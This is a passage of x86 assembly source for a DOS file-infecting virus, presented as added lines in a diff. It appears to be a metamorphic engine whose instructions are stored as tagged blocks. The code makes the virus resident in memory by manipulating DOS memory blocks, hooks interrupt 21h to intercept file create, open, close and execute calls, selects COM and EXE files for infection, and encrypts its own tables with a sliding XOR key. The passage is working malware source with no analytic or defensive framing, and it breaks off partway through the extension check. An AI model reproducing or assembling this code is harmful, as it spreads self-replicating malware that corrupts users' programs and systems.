+ + db 11101101b ; Data reference + dw 138ah ; Pointer to initial_ss_ + db 03h ; Three bytes instruction + + add cx,10h ; Add ten to initial SS relative t... + + db 02h ; Two bytes instruction + + add cx,ax ; Add segment of PSP for current p... + + db 01h ; One byte instruction + + push cx ; Save CX at stack + + db 04h ; Four bytes instruction + + push [bp+1234h] ; Save initial SP at stack + + db 11101101b ; Data reference + dw 138ch ; Pointer to initial_sp_ + db 04h ; Four bytes instruction + + mov cx,[bp+1234h] ; CX = initial CS relative to star... + + db 11101101b ; Data reference + dw 1389h ; Pointer to initial_cs_ + db 03h ; Three bytes instruction + + add cx,10h ; Add ten to initial CS relative t... + + db 02h ; Two bytes instruction + + add cx,ax ; Add segment of PSP for current p... + + db 01h ; One byte instruction + + push cx ; Save CX at stack + + db 04h ; Four bytes instruction + + push [bp+1234h] ; Save initial IP at stack + + db 11101101b ; Data reference + dw 138bh ; Pointer to initial_ip_ + db 01h ; One byte instruction + + push ax ; Save segment of PSP for current ... + + db 04h ; Four bytes instruction + + push [bp+1234h] ; Save size of memory block in par... + + db 11101101b ; Data reference + dw 1395h ; Pointer to mcb_size__ + db 01h ; One byte instruction + + push ds ; Save DS at stack + + db 02h ; Two bytes instruction + + mov cl,00h ; COM executable + + db 04h ; Four bytes instruction + + cmp [bp+1234h],cl ; COM executable? + + db 11101101b ; Data reference + dw 1388h ; Pointer to executa_sta + db 01110101b+10000000b ; Not equal? Jump to move_virus__ + dw 1390h ; Pointer to move_virus__ + db 04h ; Four bytes instruction + + lea si,[bp+1234h] ; SI = offset of origin_code_ + + db 11101101b ; Data reference + dw 1f40h ; Pointer to origin_code_ + db 03h ; Three bytes instruction + + mov ax,cs:[si] ; AX = first two bytes of original... + + db 04h ; Four bytes instruction + + mov cs:[100h],ax ; Store first two bytes of origina... 
+ + db 04h ; Four bytes instruction + + mov al,cs:[si+02h] ; AL = last byte of original code ... + + db 04h ; Four bytes instruction + + mov cs:[100h+02h],al ; Store last byte of original code... + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 1390h ; Pointer to move_virus__ + db 11101111b ; End of block + db 11101110b ; Beginning of block + dw 1774h + db 04h ; Four bytes instruction + + mov ax,[bp+1234h] ; AX = segment of PSP for current ... + + db 11101101b ; Data reference + dw 0befh ; Pointer to program_seg_ + db 04h ; Four bytes instruction + + mov cx,[bp+1234h] ; CX = initial SS relative to star... + + db 11101101b ; Data reference + dw 138ah ; Pointer to initial_ss_ + db 03h ; Three bytes instruction + + add cx,10h ; Add ten to initial SS relative t... + + db 02h ; Two bytes instruction + + add cx,ax ; Add segment of PSP for current p... + + db 01h ; One byte instruction + + push cx ; Save CX at stack + + db 04h ; Four bytes instruction + + push [bp+1234h] ; Save initial SP at stack + + db 11101101b ; Data reference + dw 138ch ; Pointer to initial_sp_ + db 04h ; Four bytes instruction + + mov cx,[bp+1234h] ; CX = initial CS relative to star... + + db 11101101b ; Data reference + dw 1389h ; Pointer to initial_cs_ + db 03h ; Three bytes instruction + + add cx,10h ; Add ten to initial CS relative t... + + db 02h ; Two bytes instruction + + add cx,ax ; Add segment of PSP for current p... + + db 01h ; One byte instruction + + push cx ; Save CX at stack + + db 04h ; Four bytes instruction + + push [bp+1234h] ; Save incorrect IP at stack + + db 11101101b ; Data reference + dw 1773h ; Pointer to incorrec_ip + db 01h ; One byte instruction + + push ax ; Save segment of PSP for current ... + + db 04h ; Four bytes instruction + + push [bp+1234h] ; Save size of memory block in par... 
+ + db 11101101b ; Data reference + dw 1395h ; Pointer to mcb_size__ + db 01h ; One byte instruction + + push ds ; Save DS at stack + + db 02h ; Two bytes instruction + + mov cl,00h ; COM executable + + db 04h ; Four bytes instruction + + cmp [bp+1234h],cl ; COM executable? + + db 11101101b ; Data reference + dw 1388h ; Pointer to executa_sta + db 01110101b+10000000b ; Not equal? Jump to move_virus__ + dw 1390h ; Pointer to move_virus__ + db 04h ; Four bytes instruction + + lea si,[bp+1234h] ; SI = offset of incorr_code_ + + db 11101101b ; Data reference + dw 1776h ; Pointer to incorr_code_ + db 03h ; Three bytes instruction + + mov ax,cs:[si] ; AX = first two bytes of incorrec... + + db 04h ; Four bytes instruction + + mov cs:[100h],ax ; Store first two bytes of incorre... + + db 04h ; Four bytes instruction + + mov al,cs:[si+02h] ; AL = last byte of incorrect code + + db 04h ; Four bytes instruction + + mov cs:[100h+02h],al ; Store last byte of incorrect code + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 1390h ; Pointer to move_virus__ + db 11101111b ; End of block +move_virus__ db 11101110b ; Beginning of block + dw 1390h ; Block identification of move_vir... + db 02h ; Two bytes instruction + + xor ax,ax ; Zero AX + + db 02h ; Two bytes instruction + + mov ds,ax ; DS = segment of DOS communicatio... + + db 05h ; Five bytes instruction + + cmp byte ptr ds:[501h],10h + + db 01110100b+10000000b ; Already resident? Jump to virus_... + dw 65h ; Pointer to virus_exit_ + db 05h ; Five bytes instruction + + mov byte ptr ds:[501h],10h + + db 01h ; One byte instruction + + push es ; Save ES at stack + + db 01h ; One byte instruction + + pop ds ; Load DS from stack (ES) + + db 03h ; Three bytes instruction + + mov ax,ds:[0ch] ; AX = offset within next virus ge... + + db 03h ; Three bytes instruction + + sub ax,730h ; Subtract offset of next virus ge... 
+ + db 04h ; Four bytes instruction + + mov [bp+1234h],ax ; Store offset of virus_exit + + db 11101101b ; Data reference + dw 0bf1h ; Pointer to vir_exit_of + db 04h ; Four bytes instruction + + mov cx,ds:[0eh] ; CX = length of virus + + db 04h ; Four bytes instruction + + mov [bp+1234h],cx ; Store length of virus + + db 11101101b ; Data reference + dw 0bf0h ; Pointer to virus_lengt + db 03h ; Three bytes instruction + + mov si,730h ; SI = offset of next virus genera... + + db 02h ; Two bytes instruction + + xor di,di ; Zero DI + + db 02h ; Two bytes instruction + + rep movsb ; Move virus to top of memory + + db 02h ; Two bytes instruction + + mov cl,04h ; Divide by paragraphs + + db 02h ; Two bytes instruction + + shr di,cl ; DI = length of next virus genera... + + db 01h ; One byte instruction + + inc di ; Increase length of next virus ge... + + db 04h ; Four bytes instruction + + mov bx,[bp+1234h] ; BX = size of memory block in par... + + db 11101101b ; Data reference + dw 1394h ; Pointer to mcb_size___ + db 04h ; Four bytes instruction + + sub bx,[bp+1234h] ; Subtract new size in paragraphs ... + + db 11101101b ; Data reference + dw 1393h ; Pointer to new_mcb_siz + db 02h ; Two bytes instruction + + sub bx,di ; Subtract length of next virus ge... + + db 01h ; One byte instruction + + dec bx ; Decrease new size in paragraphs + + db 01h ; One byte instruction + + dec bx ; Decrease new size in paragraphs + + db 02h ; Two bytes instruction + + cmp bx,di ; Insufficient memory? + + db 01110010b+10000000b ; Below? Jump to virus_exit_ + dw 65h ; Pointer to virus_exit_ + db 02h ; Two bytes instruction + + mov ah,4ah ; Resize memory block + + db 02h ; Two bytes instruction + + int 21h + + db 01110010b+10000000b ; Error? Jump to virus_exit_ + dw 65h ; Pointer to virus_exit_ + db 02h ; Two bytes instruction + + mov bx,di ; BX = number of paragraphs to all... 
+ + db 02h ; Two bytes instruction + + mov ah,48h ; Allocate memory + + db 02h ; Two bytes instruction + + int 21h + + db 01110010b+10000000b ; Error? Jump to virus_exit_ + dw 65h ; Pointer to virus_exit_ + db 01h ; One byte instruction + + dec ax ; AX = segment of current Memory C... + + db 02h ; Two bytes instruction + + mov es,ax ; ES = segment of current Memory C... + + db 07h ; Seven bytes instruction + + mov word ptr es:[01h],08h + + db 01h ; One byte instruction + + inc ax ; AX = segment of PSP for current ... + + db 02h ; Two bytes instruction + + mov es,ax ; AX = segment of PSP for current ... + + db 04h ; Four bytes instruction + + mov cx,[bp+1234h] ; CX = length of virus + + db 11101101b ; Data reference + dw 0bf0h ; Pointer to virus_lengt + db 02h ; Two bytes instruction + + xor si,si ; Zero SI + + db 02h ; Two bytes instruction + + xor di,di ; Zero DI + + db 02h ; Two bytes instruction + + rep movsb ; Move virus to top of memory + + db 01h ; One byte instruction + + push es ; Save ES at stack + + db 04h ; Four bytes instruction + + push [bp+1234h] ; Save offset of virus_exit_ at stack + + db 11101101b ; Data reference + dw 0bf1h ; Pointer to vir_exit_of + db 04h ; Four bytes instruction + + mov al,[bp+1234h] ; AL = 8-bit encryption/decryption... + + db 11101101b ; Data reference + dw 0bd7h ; Pointer to crypt_key_ + db 04h ; Four bytes instruction + + mov ah,[bp+1234h] ; AH = 8-bit sliding encryption/de... + + db 11101101b ; Data reference + dw 0bd8h ; Pointer to sliding_key_ + db 01h ; One byte instruction + + retf ; Return far + + db 11101111b ; End of block +terminate_ db 11101110b ; Beginning of block + dw 0beeh ; Block identification of terminate_ + db 03h ; Three bytes instruction + + mov ax,4c00h ; Terminate with return code + + db 02h ; Two bytes instruction + + int 21h + + db 11101111b ; End of block +get_rnd_num_ db 11101110b ; Beginning of block + dw 0bd4h ; Block identification of get_rnd_... 
+ db 01h ; One byte instruction + + push cx ; Save CX at stack + + db 02h ; Two bytes instruction + + in al,40h ; AL = 8-bit random number + + db 02h ; Two bytes instruction + + mov ah,al ; AH = 8-bit random number + + db 02h ; Two bytes instruction + + in al,40h ; AL = 8-bit random number + + db 05h ; Five bytes instruction + + xor ax,es:[02h] ; AX = 16-bit random number + + db 02h ; Two bytes instruction + + mov cl,ah ; CL = high-order byte of 16-bit r... + + db 02h ; Two bytes instruction + + rol ax,cl ; AX = 16-bit random number + + db 04h ; Four bytes instruction + + mov es:[02h],ax ; Store 16-bit random number + + db 01h ; One byte instruction + + pop cx ; Load CX from stack + + db 01h ; One byte instruction + + ret ; Return + + db 11101111b ; End of block +rnd_in_rang db 11101110b ; Beginning of block + dw 0bd5h ; Block identification of rnd_in_rang + db 02h ; Two bytes instruction + + or bp,bp ; Zero BP? + + db 01110100b+10000000b ; Zero? Jump to zero_range_ + dw 0bd6h ; Pointer to zero_range_ + db 01h ; One byte instruction + + push dx ; Save DX at stack + + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 0bd4h ; Pointer to get_rnd_num_ + db 02h ; Two bytes instruction + + xor dx,dx ; Zero DX + + db 02h ; Two bytes instruction + + div bp ; DX = random number within range + + db 01h ; One byte instruction + + xchg ax,dx ; AX = random number within range + + db 01h ; One byte instruction + + pop dx ; Load DX from stack + + db 01h ; One byte instruction + + ret ; Return + + db 11101111b ; End of block +zero_range_ db 11101110b ; Beginning of block + dw 0bd6h ; Block identification of zero_range_ + db 02h ; Two bytes instruction + + xor ax,ax ; AX = random number within range + + db 01h ; One byte instruction + + ret ; Return + + db 11101111b ; End of block +decrypt_byt db 11101110b ; Beginning of block + dw 0be0h ; Block identification of decrypt_byt + db 04h ; Four bytes instruction + + mov [bp+1234h],ah ; Store AH + + db 11101101b ; Data reference + dw 0bd9h ; 
Pointer to ah__ + db 02h ; Two bytes instruction + + mov ax,si ; AX = offset within table + + db 02h ; Two bytes instruction + + sub ax,bp ; Subtract delta offset from offse... + + db 03h ; Three bytes instruction + + sub ax,1234h ; Subtract offset of tmc_table_ fr... + + db 11101101b ; Data reference + dw 4c5h ; Pointer to tmc_table_ + db 04h ; Four bytes instruction + + mul word ptr [bp+1234h] ; AL = 8-bit sliding encryption/de... + + db 11101101b ; Data reference + dw 0bd8h ; Pointer to sliding_key_ + db 04h ; Four bytes instruction + + add al,[bp+1234h] ; AL = 8-bit encryption/decryption... + + db 11101101b ; Data reference + dw 0bd7h ; Pointer to crypt_key_ + db 02h ; Two bytes instruction + + xor al,[si] ; AL = byte of decrypted table + + db 04h ; Four bytes instruction + + mov ah,[bp+1234h] ; AH = stored AH + + db 11101101b ; Data reference + dw 0bd9h ; Pointer to ah__ + db 01h ; One byte instruction + + inc si ; Increase offset within table + + db 01h ; One byte instruction + + ret ; Return + + db 11101111b ; End of block +decrypt_id_ db 11101110b ; Beginning of block + dw 0be1h ; Block identification of decrypt_id_ + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 0be0h ; Pointer to decrypt_byt + db 02h ; Two bytes instruction + + mov ah,al ; AL = byte of decrypted table + + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 0be0h ; Pointer to decrypt_byt + db 02h ; Two bytes instruction + + xchg al,ah ; AL = byte of decrypted table + + db 01h ; One byte instruction + + ret ; Return + + db 11101111b ; End of block +virus_exit_ db 11101110b ; Beginning of block + dw 65h ; Block identification of virus_exit_ + db 01h ; One byte instruction + + pop es ; Load ES from stack + + db 02h ; Two bytes instruction + + mov ah,49h ; Free memory + + db 02h ; Two bytes instruction + + int 21h + + db 01h ; One byte instruction + + pop bx ; Load BX from stack + + db 01h ; One byte instruction + + pop ax ; Load AX from stack + + db 02h ; Two bytes instruction + + mov ds,ax ; DS = 
segment of PSP for current ... + + db 02h ; Two bytes instruction + + mov es,ax ; DS = segment of PSP for current ... + + db 02h ; Two bytes instruction + + mov ah,4ah ; Resize memory block + + db 02h ; Two bytes instruction + + int 21h + + db 04h ; Four bytes instruction + + lea bx,[bp+1234h] ; BX = offset of jmp_imm32_ + + db 11101101b ; Data reference + dw 1391h ; Pointer of jmp_imm32_ + db 01h ; One byte instruction + + pop ax ; Load AX from stack (initial IP) + + db 04h ; Four bytes instruction + + mov cs:[bx+01h],ax ; Store initial IP + + db 01h ; One byte instruction + + pop ax ; Load AX from stack (initial CS ...) + + db 04h ; Four bytes instruction + + mov cs:[bx+03h],ax ; Store initial CS relative to sta... + + db 01h ; One byte instruction + + pop ax ; Load AX from stack (initial SP) + + db 01h ; One byte instruction + + pop ss ; Load SS from stack (initial SS ...) + + db 02h ; Two bytes instruction + + mov sp,ax ; SP = stack pointer + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 1391h ; Pointer of jmp_imm32_ + db 11101111b ; End of block +jmp_imm32_ db 11101110b ; Beginning of block + dw 1391h ; Block identification of jmp_imm32_ + db 05h+10h ; Five bytes data + db 11101010b ; JMP imm32 (opcode 0eah) + dd 00h ; Pointer to virus in top of memory + db 11101111b ; End of block +ah__ db 11101110b ; Beginning of block + dw 0bd9h ; Block identification of ah__ + db 01h+10h ; One byte data + db 00h ; Accumulator register (high-orde...) + db 11101111b ; End of block +probability_ db 11101110b ; Beginning of block + dw 0bech ; Block identification of probabil... + db 02h+10h ; Two bytes data + dw 32h ; Probability + db 11101111b ; End of block +crypt_key_ db 11101110b ; Beginning of block + dw 0bd7h ; Block identification of crypt_key_ + db 01h+10h ; One data byte + db 00h ; 8-bit encryption/decryption key + db 11101111b ; End of block +sliding_key_ db 11101110b ; Beginning of block + dw 0bd8h ; Block identification to sliding_... 
+ db 02h+10h ; Two bytes data + dw 00h ; 8-bit sliding encryption/decrypt... + db 11101111b ; End of block +executa_sta db 11101110b ; Beginning of block + dw 1388h ; Block identification of executa_sta + db 01h+10h ; One byte data + db 00h ; Executable status + db 11101111b ; End of block +origin_code_ db 11101110b ; Beginning of block + dw 1f40h ; Block identification of origin_c... + db 03h+10h ; Three bytes data + db 11000011b,02h dup(00h) + db 11101111b ; End of block +incorr_code_ db 11101110b ; Beginning of block + dw 1776h ; Block identification of incorr_c... + db 03h+10h ; Three bytes data + db 11000011b,02h dup(00h) + db 11101111b ; End of block +initial_cs_ db 11101110b ; Beginning of block + dw 1389h ; Block identification of initial_cs_ + db 02h+10h ; Two bytes data + dw 0fff0h ; Initial CS relative to start of ... + db 11101111b ; End of block +initial_ss_ db 11101110b ; Beginning of block + dw 138ah ; Block identification of initial_ss_ + db 02h+10h ; Two bytes data + dw 0fff0h ; Initial SS relative to start of ... 
+ db 11101111b ; End of block +initial_ip_ db 11101110b ; Beginning of block + dw 138bh ; Block identification of initial_ip_ + db 02h+10h ; Two bytes data + dw 100h ; Initial IP + db 11101111b ; End of block +incorrec_ip db 11101110b ; Beginning of block + dw 1773h ; Block identification of incorrec_ip + db 02h+10h ; Two bytes data + dw 100h ; Incorrect IP + db 11101111b ; End of block +initial_sp_ db 11101110b ; Beginning of block + dw 138ch ; Block identification of initial_sp_ + db 02h+10h ; Two bytes data + dw 0fffeh ; Initial SP + db 11101111b ; End of block +new_mcb_siz db 11101110b ; Beginning of block + dw 1393h ; Block identification of new_mcb_siz + db 02h+10h ; Two bytes data + dw 1000h ; New size in paragraphs + db 11101111b ; End of block +mcb_size__ db 11101110b ; Beginning of block + dw 1395h ; Block identification of mcb_size__ + db 02h+10h ; Two bytes data + dw 0ffffh ; Size of memory block in paragraphs + db 11101111b ; End of block +mcb_size___ db 11101110b ; Beginning of block + dw 1394h ; Block identification of mcb_size___ + db 02h+10h ; Two bytes data + dw 00h ; Size of memory block in paragraphs + db 11101111b ; End of block +program_seg_ db 11101110b ; Beginning of block + dw 0befh ; Block identification of program_... 
+ db 02h+10h ; Two bytes data + dw 00h ; Segment of PSP for current process + db 11101111b ; End of block +virus_lengt db 11101110b ; Beginning of block + dw 0bf0h ; Block identification of virus_lengt + db 02h+10h ; Two bytes data + dw 00h ; Length of virus + db 11101111b ; End of block +vir_exit_of db 11101110b ; Beginning of block + dw 0bf1h ; Block identification of vir_exit_of + db 02h+10h ; Two bytes data + dw 00h ; Offset of virus_exit_ + db 11101111b ; End of block +tmc_table_ db 11101110b ; Beginning of block + dw 4c5h ; Block identification of tmc_table_ + db 11101111b ; End of block + db 00h ; End of table +second_table db 11101111b ; End of block +virus_end: +crypt_table db 11101110b ; Beginning of block + dw 66h ; Block identification of crypt_table + db 02h ; Two bytes instruction + + xor bp,bp ; Zero BP + + db 02h ; Two bytes instruction + + mov ds,bp ; DS = segment of BIOS data segment + + db 04h ; Four bytes instruction + + mov bx,ds:[46dh] ; BX = timer ticks since midnight + + db 01h ; One byte instruction + + push cs ; Save CS at stack + + db 01h ; One byte instruction + + pop ds ; Load DS from stack (CS) + + db 03h ; Three bytes instruction + + and bx,1111111111110000b + + db 04h ; Four bytes instruction + + mov ds:[1234h],bx ; Store timer ticks since midnight + + db 11101101b ; Data reference + dw 13adh ; Pointer to timer_ticks + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 0bfeh ; Pointer to crypt_table_ + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 0bd4h ; Pointer to get_rnd_num_ + db 03h ; Three bytes instruction + + mov ds:[1234h],al ; Store 8-bit encryption/decryptio... + + db 11101101b ; Data reference + dw 0bd7h ; Pointer to crypt_key_ + db 04h ; Four bytes instruction + + mov ds:[1234h],ah ; Store 8-bit sliding encryption/d... 
+ + db 11101101b ; Data reference + dw 0bd8h ; Pointer to sliding_key_ + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 0bfeh ; Pointer to crypt_table_ + db 03h ; Three bytes instruction + + mov ax,3521h ; Get interrupt vector 21h + + db 02h ; Two bytes instruction + + int 21h + + db 03h ; Three bytes instruction + + mov di,1234h ; DI = offset of int21_addr + + db 11101101b ; Data reference + dw 0c9h ; Pointer to int21_addr + db 02h ; Two bytes instruction + + mov [di],bx ; Store offset of interrupt 21h + + db 03h ; Three bytes instruction + + mov [di+02h],es ; Store segment of interrupt 21h + + db 03h ; Three bytes instruction + + mov dx,1234h ; DX = offset of int21_virus + + db 11101101b ; Data reference + dw 0c8h ; Pointer to int21_virus + db 03h ; Three bytes instruction + + mov ax,2521h ; Set interrupt vector 21h + + db 02h ; Two bytes instruction + + int 21h + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 65h ; Pointer to virus_exit_ + db 11101111b ; End of block +crypt_table_ db 11101110b ; Beginning of block + dw 0bfeh ; Block identification of crypt_ta... + db 03h ; Three bytes instruction + + mov si,1234h ; SI = offset of tmc_table_ + + db 11101101b ; Data reference + dw 4c5h ; Pointer to tmc_table_ + db 03h ; Three bytes instruction + + mov cx,(code_end-first_table) + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bffh ; Pointer to crypt_loop + db 11101111b ; End of block +crypt_loop db 11101110b ; Beginning of block + dw 0bffh ; Block identification of crypt_loop + db 02h ; Two bytes instruction + + xor [si],al ; Encrypt byte of table + + db 01h ; One byte instruction + + inc si ; Increase offset within table + + db 02h ; Two bytes instruction + + add al,ah ; Add 8-bit sliding encryption key... + + db 01h ; One byte instruction + + dec cx ; Decrease counter + + db 01110101b+10000000b ; Not zero? 
Jump to crypt_loop + dw 0bffh ; Pointer to crypt_loop + db 01h ; One byte instruction + + ret ; Return + + db 11101111b ; End of block +int21_virus db 11101110b ; Beginning of block + dw 0c8h ; Block identification of int21_virus + db 01h ; One byte instruction + + cld ; Clear direction flag + + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 13a0h ; Pointer to push_regs + db 03h ; Three bytes instruction + + cmp ah,3ch ; Create file? + + db 01110100b+10000000b ; Equal? Jump to exam_drv_let + dw 139ah ; Pointer to exam_drv_let + db 03h ; Three bytes instruction + + cmp ah,3dh ; Open file? + + db 01110100b+10000000b ; Equal? Jump to exam_drv_let + dw 139ah ; Pointer to exam_drv_let + db 03h ; Three bytes instruction + + cmp ah,3eh ; Close file? + + db 01110100b+10000000b ; Equal? Jump to infect_fil + dw 139ch ; Pointer to infect_fil + db 03h ; Three bytes instruction + + cmp ah,4bh ; Load and/or execute program? + + db 01110101b+10000000b ; Not equal? Jump to int21_exit + dw 13a6h ; Pointer to int21_exit + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 13a9h ; Pointer to infect_file + db 11101111b ; End of block +infect_file db 11101110b ; Beginning of block + dw 13a9h ; Block identification of infect_file + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 1392h ; Pointer to infect_fil_ + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 13a6h ; Pointer to int21_exit + db 11101111b ; End of block +int21_exit db 11101110b ; Beginning of block + dw 13a6h ; Block identification of int21_exit + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 13a1h ; Pointer to pop_regs + db 05h ; Five bytes instruction + + jmp dword ptr cs:[1234h] + + db 11101101b ; Data reference + dw 0c9h ; Pointer to int21_addr + db 11101111b ; End of block +exam_drv_let db 11101110b ; Beginning of block + dw 139ah ; Block identification of exam_drv... 
+ db 02h ; Two bytes instruction + + mov si,dx ; SI = offset of filename + + db 01h ; One byte instruction + + lodsb ; AL = first byte of filename + + db 03h ; Three bytes instruction + + cmp byte ptr [si],':' ; Does filename include drive letter? + + db 01110101b+10000000b ; Not equal? Jump to exam_def_drv + dw 139bh ; Pointer to exam_def_drv + db 02h ; Two bytes instruction + + or al,20h ; Lowercase character + + db 02h ; Two bytes instruction + + cmp al,'b' ; Floppy disk? + + db 01110111b+10000000b ; Above? Jump to int21_exit + dw 13a6h ; Pointer to int21_exit + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 13a8h ; Pointer to infect_file_ + db 11101111b ; End of block +exam_def_drv db 11101110b ; Beginning of block + dw 139bh ; Block identification of exam_def... + db 01h ; One byte instruction + + push ax ; Save AX at stack + + db 02h ; Two bytes instruction + + mov ah,19h ; Get current default drive + + db 02h ; Two bytes instruction + + int 21h + + db 02h ; Two bytes instruction + + cmp al,01h ; Floppy disk? + + db 01h ; One byte instruction + + pop ax ; Load AX from stack + + db 01110111b+10000000b ; Above? Jump to int21_exit + dw 13a6h ; Pointer to int21_exit + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 13a8h ; Pointer to infect_file_ + db 11101111b ; End of block +infect_file_ db 11101110b ; Beginning of block + dw 13a8h ; Block identification of infect_f... + db 03h ; Three bytes instruction + + cmp ah,3ch ; Create file? + + db 01110101b+10000000b ; Not equal? Jump to infect_file + dw 13a9h ; Pointer to infect_file + db 02h ; Two bytes instruction + + xor bx,bx ; Zero file handle + + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 13abh ; Pointer to exam_psp_etc + db 01110101b+10000000b ; Not zero? 
Jump to int21_exit + dw 13a6h ; Pointer to int21_exit + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 13a4h ; Pointer to int24_store + db 02h ; Two bytes instruction + + mov ah,60h ; Canonicalize filename or path + + db 01h ; One byte instruction + + dec si ; SI = offset of filename + + db 01h ; One byte instruction + + push cs ; Save CS at stack + + db 01h ; One byte instruction + + pop es ; Load ES from stack (CS) + + db 03h ; Three bytes instruction + + mov di,1234h ; DI = offset of filename + + db 11101101b ; Data reference + dw 139eh ; Pointer to filename + db 02h ; Two bytes instruction + + int 21h + + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 13a1h ; Pointer to pop_regs + db 01h ; One byte instruction + + pushf ; Save flags at stack + + db 05h ; Five bytes instruction + + call dword ptr cs:[1234h] + + db 11101101b ; Data reference + dw 0c9h ; Pointer to int21_addr + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 13a0h ; Pointer to push_regs + db 01h ; One byte instruction + + pushf ; Save flags at stack + + db 03h ; Three bytes instruction + + mov bx,1111111111111111b + + db 03h ; Three bytes instruction + + adc bx,00h ; BX = file handle mask + + db 02h ; Two bytes instruction + + and ax,bx ; AX = file handle + + db 04h ; Four bytes instruction + + mov cs:[1234h],ax ; Store file handle + + db 11101101b ; Data reference + dw 139dh ; Pointer to file_handle + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 13a5h ; Pointer to int24_load + db 01h ; One byte instruction + + popf ; Load flags from stack + + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 13a1h ; Pointer to pop_regs + db 01h ; One byte instruction + + sti ; Set interrupt-enable flag + + db 03h ; Three bytes instruction + + retf 02h ; Return far and ??? 
+ + db 11101111b ; End of block +infect_fil db 11101110b ; Beginning of block + dw 139ch ; Block identification of infect_fil + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 13abh ; Pointer to exam_psp_etc + db 01110010b+10000000b ; Store segment of PSP for current... + dw 13a6h ; Pointer to int21_exit + db 02h ; Two bytes instruction + + xor ax,ax ; Zero file handle + + db 04h ; Four bytes instruction + + mov cs:[1234h],ax ; Store file handle + + db 11101101b ; Data reference + dw 139dh ; Pointer to file_handle + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 13a1h ; Pointer to pop_regs + db 01h ; One byte instruction + + pushf ; Save flags at stack + + db 05h ; Five bytes instruction + + call dword ptr cs:[1234h] + + db 11101101b ; Data reference + dw 0c9h ; Pointer to int21_addr + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 13a0h ; Pointer to push_regs + db 01h ; One byte instruction + + pushf ; Save flags at stack + + db 01h ; One byte instruction + + push cs ; Save CS at stack + + db 01h ; One byte instruction + + pop ds ; Load DS from stack (CS) + + db 03h ; Three bytes instruction + + mov dx,1234h ; DX = offset of filename + + db 11101101b ; Data reference + dw 139eh ; Pointer to filename + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 1392h ; Pointer to infect_fil_ + db 01h ; One byte instruction + + popf ; Load flags from stack + + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 13a1h ; Pointer to pop_regs + db 01h ; One byte instruction + + sti ; Set interrupt-enable flag + + db 03h ; Three bytes instruction + + retf 02h ; Return far and ??? + + db 11101111b ; End of block +exam_psp_etc db 11101110b ; Beginning of block + dw 13abh ; Block identification of exam_psp... 
+ db 01h ; One byte instruction + + push bx ; Save BX at stack + + db 02h ; Two bytes instruction + + mov ah,62h ; Get current PSP address + + db 02h ; Two bytes instruction + + int 21h + + db 03h ; Three bytes instruction + + mov di,1234h ; DI = offset of progra_seg + + db 11101101b ; Data reference + dw 139fh ; Pointer to progra_seg + db 03h ; Three bytes instruction + + cmp cs:[di],bx ; Segment of PSP for current proc...? + + db 03h ; Three bytes instruction + + mov cs:[di],bx ; Store segment of PSP for current... + + db 03h ; Three bytes instruction + + mov di,1234h ; DI = offset of file_handle + + db 11101101b ; Data reference + dw 139dh ; Pointer to file_handle + db 01110101b+10000000b ; Not equal? Jump to dont_infect + dw 13ach ; Pointer to dont_infect + db 01h ; One byte instruction + + pop bx ; Load BX from stack + + db 02h ; Two bytes instruction + + mov ax,bx ; AX = file handle + + db 03h ; Three bytes instruction + + sub ax,cs:[di] ; Subtract saved file handle from ... + + db 03h ; Three bytes instruction + + add ax,0ffffh ; Add sixty-five thousand five hun... 
+ + db 01h ; One byte instruction + + inc ax ; Increase file handle + + db 01h ; One byte instruction + + ret ; Return + + db 11101111b ; End of block +dont_infect db 11101110b ; Beginning of block + dw 13ach ; Block identification of dont_infect + db 05h ; Five bytes instruction + + mov word ptr cs:[di],00h + + db 02h ; Two bytes instruction + + xor ax,ax ; Zero file handle + + db 01h ; One byte instruction + + pop bx ; Load BX from stack + + db 01h ; One byte instruction + + stc ; Set carry flag + + db 01h ; One byte instruction + + ret ; Return + + db 11101111b ; End of block +infect_fil_ db 11101110b ; Beginning of block + dw 1392h ; Block identification of infect_fil_ + db 01h ; One byte instruction + + push ds ; Save DS at stack + + db 01h ; One byte instruction + + pop es ; Load ES from stack (DS) + + db 02h ; Two bytes instruction + + mov di,dx ; DI = offset of filename + + db 03h ; Three bytes instruction + + mov cx,43h ; CX = number of bytes to search t... + + db 02h ; Two bytes instruction + + xor al,al ; Zero AL + + db 02h ; Two bytes instruction + + repne scasb ; Find end of filename + + db 01110101b+10000000b ; Not equal? Jump to infect_exit_ + dw 0fbh ; Pointer to infect_exit_ + db 03h ; Three bytes instruction + + lea si,[di-05h] ; SI = offset of the dot in the fi... + + db 01h ; One byte instruction + + lodsw ; AX = two bytes of filename + + db 03h ; Three bytes instruction + + or ax,2020h ; Lowercase characters + + db 03h ; Three bytes instruction + + mov bx,'mo' ; COM executable + + db 03h ; Three bytes instruction + + cmp ax,'c.' ; COM executable? + + db 01110100b+10000000b ; Equal? Jump to examine_ext + dw 0f0h ; Pointer to examine_ext + db 03h ; Three bytes instruction + + mov bx,'ex' ; EXE executable + + db 03h ; Three bytes instruction + + cmp ax,'e.' ; EXE executable? + + db 01110100b+10000000b ; Equal? 
Jump to examine_ext
+ dw 0f0h ; Pointer to examine_ext
+ db 11101001b ; JMP imm16 (opcode 0e9h)
